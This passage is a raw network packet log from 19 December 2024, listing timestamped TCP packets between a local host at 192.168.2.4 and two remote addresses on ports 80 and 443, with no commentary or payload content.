                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.328480005 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.328480005 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.328536034 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.328561068 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.330915928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.330929995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.330945015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.330981016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331018925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331362963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331403017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331466913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331521034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331748962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331760883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331772089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331795931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.331835985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.332168102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.332179070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.332211018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.332465887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.332478046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.332513094 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333048105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333125114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333192110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333209038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333214998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333247900 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333839893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333889008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333893061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.333930969 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334104061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334115982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334129095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334156036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334175110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334691048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334703922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334714890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334738016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.334774017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335390091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335402966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335418940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335433006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335468054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335875988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335889101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.335926056 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336231947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336242914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336253881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336280107 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336298943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336951017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336970091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.336982012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.337002993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.337038040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.337707996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.337719917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.337754011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338058949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338071108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338097095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338100910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338131905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338154078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338802099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338814020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338824987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338856936 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.338876963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339543104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339555025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339595079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339879990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339893103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339904070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339965105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.339965105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.340727091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.340745926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.340763092 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.340779066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.340831041 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.341458082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.341470003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.341481924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.341496944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.341525078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342134953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342147112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342159033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342184067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342216969 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342654943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342667103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342678070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342706919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.342726946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.343388081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.343400955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.343413115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.343436956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.343471050 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344156027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344171047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344181061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344194889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344209909 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344249010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344850063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344891071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344894886 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344907999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344917059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344933987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.344959021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.464917898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465023041 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465039015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465053082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465082884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465110064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465432882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465568066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465615988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465811014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465822935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465832949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465858936 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.465899944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466279984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466289997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466337919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466563940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466576099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466609955 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.466645956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.467025042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.467036963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.467078924 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469152927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469166040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469177008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469240904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469270945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469791889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.469832897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.471364021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.471375942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.471457005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.472029924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.472048998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.472083092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.472105026 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.473592043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.473603964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.473613977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.473644972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.473680019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.474328041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.474385023 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.475864887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.475876093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.475920916 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.476640940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.476654053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.476694107 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.478177071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.478188038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.478199005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.478228092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.478249073 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.478957891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.479020119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.480535984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.480549097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.480611086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.481159925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.481172085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.481215000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.481946945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.481959105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.482007027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.482656002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.482667923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.482716084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.482758045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.522747993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.522891998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.522903919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.523088932 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.523467064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.523688078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.523699999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.523749113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.523998022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524049997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524230003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524241924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524252892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524276972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524317026 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524786949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524799109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524811983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524840117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.524878979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.525434971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.525609970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.525621891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.525688887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526047945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526060104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526099920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526527882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526576996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526706934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526719093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.526756048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.527167082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.527178049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.527189016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.527209044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.527251005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528135061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528165102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528175116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528187990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528211117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528243065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528889894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528918982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528929949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.528970957 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.529735088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.529747009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.529797077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530044079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530055046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530065060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530093908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530118942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530922890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530935049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530945063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530971050 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.530997992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.531584024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.531598091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.531640053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532071114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532083988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532094955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532250881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532721996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532735109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532744884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532763004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.532804966 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.533504009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.533514977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.533556938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534117937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534162998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534744024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.534755945 CET804974331.41.244.11192.168.2.4
